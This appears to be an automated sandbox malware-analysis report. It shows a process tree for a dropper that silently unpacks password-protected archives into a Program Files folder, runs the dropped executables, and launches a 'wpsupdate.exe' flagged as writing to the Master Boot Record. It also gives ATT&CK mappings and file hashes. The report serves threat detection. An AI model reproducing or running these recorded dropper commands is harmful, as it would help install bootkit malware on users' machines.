C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1884
-
-
C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
-
C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode33⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1220
-
-
C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"3⤵
- Writes to the Master Boot Record (MBR)
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2444
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004D8" "00000000000005A4"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2844
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Installer Packages
1Pre-OS Boot
1Bootkit
1Defense Evasion
Pre-OS Boot
1Bootkit
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5a4a8ce0ddf6ab88bb915a101d04f043e
SHA1531bf0452cf8c833397af429808f7c03e30ec507
SHA256cb25460926ba0b6cbc61b505926ec12e9852b92fada8bd37ef854a18be2dcaf8
SHA512318e4ccb6669ca3a6da25bd199ce909005006ede2f69a581a35b0020421cffb5f130fbcbe0748b2bc9ffe6bb8c3241d8a01793fbcd1f36bd864b4b8acf4adfe8
-
Filesize
2.1MB
MD5fb22fb79f366c65257b7adb24c70d843
SHA1ca6d29a4806d52350e1a50c7b71526dfaab2d525
SHA25644f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d
SHA512c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9
-
Filesize
577KB
MD5c31c4b04558396c6fabab64dcf366534
SHA1fa836d92edc577d6a17ded47641ba1938589b09a
SHA2569d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99
-
Filesize
1.5MB
MD5d045828473a8165effd59a97232e6107
SHA1f86bd9763d6c70ec3ca79134598de4fa44c6bc94
SHA2569aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016
SHA51207e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659
-
Filesize
1.5MB
MD5831ff4029b30419da4ac4d32bf8ff05c
SHA18c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc
SHA256ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d
SHA51217f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5
-
Filesize
6.0MB
MD557dadd6a929f64c2b1efe2d52c1c4985
SHA1962cb227f81f885f23826c3e040aa9dbc97659cf
SHA256996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5
SHA5123f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf
-
Filesize
2KB
MD5c313ef3605773ce19c1d74c4cf92990e
SHA175f90116d63472a7173fb2f1e2413d98b2aa09b1
SHA256d1f1280e89caa8ead1024f56614aad8e4a3dd0f5d697a57a2f660170abac1da7
SHA51213239ff124d6e39d5195f208197fac1bf929e7abce4b9a401e3f4dab5e3e09250fc8560eb5f835e76354b194d7e5d7e4b24bed424bda0b126cd2b0f36f0d7bfd
-
Filesize
28.2MB
MD5ef294458016f546c5eebd07d2dd98bad
SHA166bb14f670055272e12899d401b8668cad15fac9
SHA256c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
SHA51297ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333